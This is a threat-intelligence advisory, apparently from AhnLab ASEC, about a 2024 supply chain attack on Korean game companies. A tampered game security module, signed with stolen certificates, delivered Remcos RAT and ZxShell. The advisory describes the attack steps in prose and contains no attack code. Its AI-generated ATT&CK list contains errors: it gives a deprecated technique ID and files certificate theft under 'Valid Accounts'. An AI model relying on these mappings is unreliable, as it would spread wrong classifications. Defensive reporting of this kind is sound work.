- Short Summary: AhnLab’s ASEC has identified supply chain attacks targeting Korean game companies by the group Larva-24008. The attackers compromised a game security module to distribute malware, primarily targeting game companies. The malware was signed with a valid certificate, allowing it to be distributed through official channels, leading to the installation of remote control malware on affected systems.
- Key Points:
- Supply chain attacks were identified against Korean game companies by the group Larva-24008.
- The attackers inserted malware into a game security module, affecting games distributed through official channels.
- Malware was signed with a valid certificate from a Korean game security company.
- The attack occurred in April and May of 2024, targeting specific game companies.
- Malware executed PowerShell commands to download obfuscated scripts, including Remcos RAT.
- Stolen certificates have been used in attacks since at least 2017, affecting multiple companies.
- Recent misuse of certificates included signing a game launcher that collected user information.
- Supply chain attacks are increasing in frequency and pose significant risks to organizations and individuals.
- Implementation of a Software Bill of Materials (SBOM) is suggested to enhance supply chain security.
MITRE ATT&CK TTPs – created by AI
- Technique Name: Supply Chain Compromise (T1195)
- Procedure: Attackers compromised a game security module to distribute malware through legitimate game installations.
- Technique Name: Remote Access Tools (T1219)
- Procedure: The malware installed Remcos RAT to allow remote control of infected systems.
- Technique Name: PowerShell (T1086)
- Procedure: The malware executed PowerShell commands to download and run obfuscated scripts from specific addresses.
- Technique Name: Valid Accounts (T1078)
- Procedure: Attackers used valid certificates from a Korean game security company to sign malware, allowing it to bypass security measures.
While monitoring threats against Korean companies and users, AhnLab SEcurity intelligence Center (ASEC) has recently identified evidence of supply chain attacks targeting Korean game companies. The attack group, identified by AhnLab as Larva-24008, targeted a Korean game security company to insert a malicious routine into the game security module. As a result, games using the compromised security module were distributed with malware, and systems that installed these games ultimately had remote control malware installed for the threat actor to seize control. The attacker did not target all users of the games using the tampered security module; instead, a remote control malware strain was primarily installed on companies identified as game companies. In other words, this is presumed to be an APT attack targeting Korean game companies.
The attack occurred in April and May of 2024, with the attacker inserting malware into a game security-related program module and distributing it using a valid certificate from the program’s developer. The distribution was carried out in the form of a supply chain attack: installing games from the official websites of Korean game companies would also install a malware strain. The code inserted by the threat actor executes PowerShell commands to download and run obfuscated scripts from specific addresses. Ultimately, if the compromised system matches a specific IP designated by the attacker, the code downloads Remcos RAT.
Figure 1. The supply chain attack flowchart using a game security program
Figure 2. Comparing a normal module and a compromised module
A notable feature of the malware strains identified in the attack cases is that they were signed with a valid certificate from a Korean game security company. The certificate exploited by the threat actor has been continuously stolen and used in attacks since at least 2017, being used to sign malware strains such as ZxShell, Mimikatz, and PrintSpoofer. ZxShell is an open-source backdoor malware that has been predominantly used by attackers based in China. According to some reports, the APT 27 attack group (known to be based in China and also referred to as BRONZE UNION, EMISSARY PANDA, Iron Tiger, and Lucky Mouse) used ZxShell signed with a valid certificate from the Chinese software development company Hangzhou Bianfeng Networking Technology for attacks [1] [2]. ASEC’s findings revealed that the case was essentially in the same form as ZxShell signed with a certificate from a Korean game company.
However, these attacks have been ongoing for a long time, and valid certificates from numerous companies, both Korean and global, were used in the attacks. In Korea, a game development company and game security company were identified to be used in the attack, and in addition, certificates from Chinese software development companies were exploited. Based on the malware strains and C&C addresses used, the attacks appear to be primarily conducted by threat actors based in China. However, it is not confirmed whether all the attacks and malware discussed are the work of the same attacker or if there is a specific association with any APT group.
[1] Emissary Panda APT: Recent infrastructure and RAT analysis
[2] BRONZE PRESIDENT Targets Government Officials
Among the recent cases of misuse, there is an instance from August 2024 where a Korean game development company’s certificate was used to sign the launcher program of a game called “*** Arena.” The launcher is not a typical malware strain, but the fact that it steals various user information and uses the same C&C address as the tampered module during the update indicates that it is not just a simple game client. In other words, stolen certificates have been used to sign various malware strains including ZxShell and for signing global game clients. This suggests the possibility that the stolen certificates are being used by multiple attackers.
|
Country |
Signed Company |
Valid (as of Sep. 27, 2024) |
Description |
|
Republic of Korea |
Company A |
X |
Game development company |
|
Republic of Korea |
Company B |
X |
Game development company |
|
Republic of Korea |
Company C |
X |
Game security program development company |
|
Republic of Korea |
Company D |
X |
Game development company |
|
Republic of Korea |
Company E |
O |
Game development company |
|
China |
Company F |
O |
App development company |
|
China |
Company G |
O |
Game development company |
|
China |
Company H |
X |
Software development company |
|
China |
Company I |
X |
Software development company |
|
China |
Company J |
O |
IT company |
Table 1. Information on certificates exploited by the threat actor
ZxShell used in the attack is installed as a service by a dropper. The ZxShell types that are ultimately installed are not all the same, but they are characterized by having many features removed compared to the original ZxShell, providing only basic functions like remote shell and file management. Although the threat actor cannot use functions like keylogging, collecting information, and remote desktop, the supported functions shown below are sufficient to control the infected system. The attacker also used a valid certificate from a Korean game company to sign ZxShell as well as tools used for privilege escalation and credential theft such as Mimikatz, PrintSpoofer, and Nirsoft’s Dialupass to use them in attacks.
|
Command |
Function |
|
GetCMD |
Remote shell |
|
FileMG |
File management |
|
rPortMap |
Port forwarding |
|
End |
Stop |
|
Exit / Quit |
Terminate |
Table 2. Commands supported by ZxShell used in the attack
In a recent attack case confirmed in August 2024, the valid certificates of the game companies discussed above were not only used to sign malware but also to sign game launchers. The image below is the homepage of a game called “*** Arena,” where you can sign up and download the game client. Upon investigating the game launchers for *** Arena, it was confirmed that they were signed and distributed using valid certificates from Korean game companies.
Figure 3. Homepage of *** Arena
The *** Arena game launcher sends the following information to the threat actor’s server: user name, computer name, MAC address, IP address, and version information of hardware (CPU, GPU, RAM, motherboard, etc.) and Windows.
Figure 4. Information collected from the system
The launcher’s binary has various encrypted strings including download URLs and the commands mentioned above. These strings are decrypted during execution, and one thing to note is that some strings contain profanities.
Figure 5. Strings identified in the game launcher
Cases of software supply chain attacks have been noticeably increasing recently. Software supply chain attacks are being observed in both state-sponsored APT attackers and threat actors aiming for financial gain. If a supply chain attack is successful, its impact is significant enough to affect all organizations and individuals using the program. AhnLab is identifying and responding to various software supply chain attacks that are increasing in frequency.
Supply chain attacks target all software infrastructure, and because attacks become possible if protection is not in place at every stage, there are difficulties in recognizing and defending against them. Even after vulnerabilities are disclosed and administrators or development companies become aware of supply chain attacks, there are many cases where appropriate actions have not been taken for a long time. If a Software Bill of Materials (SBOM) is implemented and governments and companies cooperate and take action together, it is expected to be the first step in strengthening the supply chain security and building a secure digital environment.
Source : https://asec.ahnlab.com/en/83693/